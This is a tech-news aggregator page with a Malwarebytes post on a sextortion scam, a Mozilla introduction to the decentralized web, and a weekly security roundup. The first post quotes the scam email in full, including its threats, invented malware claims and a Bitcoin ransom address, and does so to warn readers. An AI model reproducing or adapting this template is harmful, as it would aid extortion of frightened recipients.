Now, the drop of a password, even an old one, is enough to get many readers to raise a brow and open the email. Once opened, though, one of two things can happen. Those who haven’t viewed porn on their computer can breathe a sigh of relief. For the millions of others who have, however, a little panic might ensue, especially when the scammers ask for $7,000 in Bitcoin for hush money.

The email reads as follows:

I am well aware [redacted] is your password. Lets get directly to purpose. You don’t know me and you are probably thinking why you’re getting this email? Not a single person has compensated me to check you.

Let me tell you, I setup a malware on the xxx videos (porn material) web-site and you know what, you visited this website to experience fun (you know what I mean). When you were watching video clips, your web browser began functioning as a RDP that has a key logger which provided me with accessibility to your display as well as web cam. Right after that, my software collected all of your contacts from your Messenger, Facebook, as well as emailaccount. After that I made a double video. First part displays the video you were watching (you’ve got a good taste rofl), and next part displays the view of your webcam, & its you.

You actually have two different possibilities. Shall we review each one of these solutions in aspects:

Very first option is to just ignore this email. In such a case, I will send out your actual recorded material to every bit of your personal contacts and thus think about regarding the embarrassment you will see. In addition if you are in a romantic relationship, how it would affect?

2nd solution is to give me $7000. I will call it a donation. Then, I most certainly will straightaway discard your video footage. You will continue on with your way of life like this never occurred and you will not ever hear back again from me.

You’ll make the payment by Bitcoin (if you do not know this, search “how to buy bitcoin” in Google).

BTC Address: 14Fg5D24cxseFXQXv89PJCHmsTM74iGyDb

[CASE-SENSITIVE copy and paste it]

If you may be wondering about going to the authorities, good, this email can not be traced back to me. I have covered my actions. I am just not attempting to charge you very much, I only want to be compensated. I’ve a special pixel within this email, and now I know that you have read this e mail. You have one day to pay. If I do not get the BitCoins, I will definitely send out your video recording to all of your contacts including friends and family, colleagues, and many others. Nevertheless, if I do get paid, I’ll destroy the recording right away. It’s a non-negotiable offer, thus don’t waste mine time and yours by responding to this message. If you want to have evidence, reply with Yup! and I definitely will send your video to your 9 contacts.

This sextortion scam has been around for quite a while; the new twist is the use of real passwords. According to Krebs on Security, the scammers likely collected these passwords and emails from a data dump possibly dating back 10 years or more. Our own Malwarebytes researchers have been scouring various data dumps looking for the source of the breach, but so far have not found the smoking gun. The problem is that most users’ credentials have been swiped in one breach or another, if not multiple—if not dozens! So it’s difficult to triangulate and trace back to a single source.

The good news is, if you received one of these emails, you simply need only flag it as spam and delete. And if you’re suddenly worried about someone being able to see your nocturnal activities, you can buy a webcam cover for between $US5 and $10.

The post What’s in the spam mailbox this week? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Introducing the Dweb

Mozilla Hacks - Tue, 07/31/2018 - 14:00
Introducing the Dweb

The web is the most successful programming platform in history, resulting in the largest open and accessible collection of human knowledge ever created. So yeah, it’s pretty great. But there are a set of common problems that the web is not able to address.

Have you ever…

  • Had a website or app you love get updated to a new version, and you wished to go back to the old version?
  • Tried to share a file between your phone and laptop or tv or other device while not connected to the internet? And without using a cloud service?
  • Gone to a website or service that you depend on, only to find it’s been shut down? Whether it got bought and enveloped by some internet giant, or has gone out of business, or whatever, it was critical for you and now it’s gone.

Additionally, the web is facing critical internet health issues, seemingly intractable due to the centralization of power in the hands of a few large companies who have economic interests in not solving these problems:

  • Hate speech, harassment and other attacks on social networks
  • Repeated attacks on Net Neutrality by governments and corporations
  • Mass human communications compromised and manipulated for profit or political gain
  • Censorship and whole internet shutdowns by governments

These are some of the problems and use-cases addressed by a new wave of projects, products and platforms building on or with web technologies but with a twist: They’re using decentralized or distributed network architectures instead of the centralized networks we use now, in order to let the users control their online experience without intermediaries, whether government or corporate. This new structural approach gives rise to the idea of a ‘decentralized web’, often conveniently shortened to ‘dweb’.

You can read a number of perspectives on centralization, and why it’s an important issue for us to tackle, in Mozilla’s Internet Health Report, released earlier this year.

What’s the “D” in Dweb?!

The “d” in “dweb” usually stands for either decentralized or distributed.
What is the difference between distributed vs decentralized architectures? Here’s a visual illustration:


(Image credit: Openclipart.org, your best source for technical clip art with animals)

In centralized systems, one entity has control over the participation of all other entities. In decentralized systems, power over participation is divided between more than one entity. In distributed systems, no one entity has control over the participation of any other entity.

Examples of centralization on the web today are the domain name system (DNS), servers run by a single company, and social networks designed for controlled communication.

A few examples of decentralized or distributed projects that became household names are Napster, BitTorrent and Bitcoin.

Some of these new dweb projects are decentralizing identity and social networking. Some are building distributed services in or on top of the existing centralized web, and others are distributed application protocols or platforms that run the web stack (HTML, JavaScript and CSS) on something other than HTTP. Also, there are blockchain-based platforms that run anything as long as it can be compiled into WebAssembly.

Here We Go

Mozilla’s mission is to put users in control of their experiences online. While some of these projects and technologies turn the familiar on its head (no servers! no DNS! no HTTP(S)!), it’s important for us to explore their potential for empowerment.

This is the first post in a series. We’ll introduce projects that cover social communication, online identity, file sharing, new economic models, as well as high-level application platforms. All of this work is either decentralized or distributed, minimizing or entirely removing centralized control.

You’ll meet the people behind these projects, and learn about their values and goals, the technical architectures used, and see basic code examples of using the project or platform.

So leave your assumptions at the door, and get ready to learn what a web more fully in users’ control could look like.

Note: This post is the introduction. The following posts in the series are listed below.

The post Introducing the Dweb appeared first on Mozilla Hacks - the Web developer blog.

Categories: Techie Feeds

A week in security (July 23 – July 29)

Malwarebytes - Mon, 07/30/2018 - 15:57

Last week on Labs, we looked at an adware called MobiDash getting stealthy, a new strain of Mac malware called Proton that was found after two years, and the ‘Hidden Bee’ miner that was delivered via an improved drive-by download toolkit. We also delved into the security improvements expected in the new Android P, and had a fresh look at Trojans to help users define what they really are.

We also gave you a quick introduction to the Malwarebytes Browser Extensions for Chrome and Firefox.

Other news:
  • Russian hackers reached US utility control rooms, Homeland Security officials say. (Source: The Wall Street Journal)
  • Dozens were sentenced for a call center scam, where victims bought iTunes gift cards under threat of arrest. (Source: Gizmodo)
  • Guardian US finds that 72 percent of video spend is fraudulent without Ads.txt. (Source: Mediapost)
  • No, you shouldn’t use the new version of Stylish. (Source: Robert Heaton)
  • These are 2018’s biggest hacks, leaks, and data breaches so far. (Source: ZDNet)
  • Google Translate is doing something incredibly sinister and it looks like we’re all doomed. (Source: IFLScience)
  • The Death botnet targets AVTech devices with a 2-year-old exploit. (Source: Security Affairs)
  • Long Beach Port terminal hit by ransomware attack. (Source: Press Telegram)
  • State governments warned of malware-laden CD sent via snail mail from China. (Source: Krebs on Security)
  • 23andMe sold access to your DNA library to big pharma, but you can opt out. (Source: MotherBoard)
  • Fake websites for Keepass, 7Zip, Audacity, and others found pushing adware. (Source: BleepingComputer)

Stay safe, everyone!

The post A week in security (July 23 – July 29) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Pages

Subscribe to Furiously Eclectic People aggregator - Techie Feeds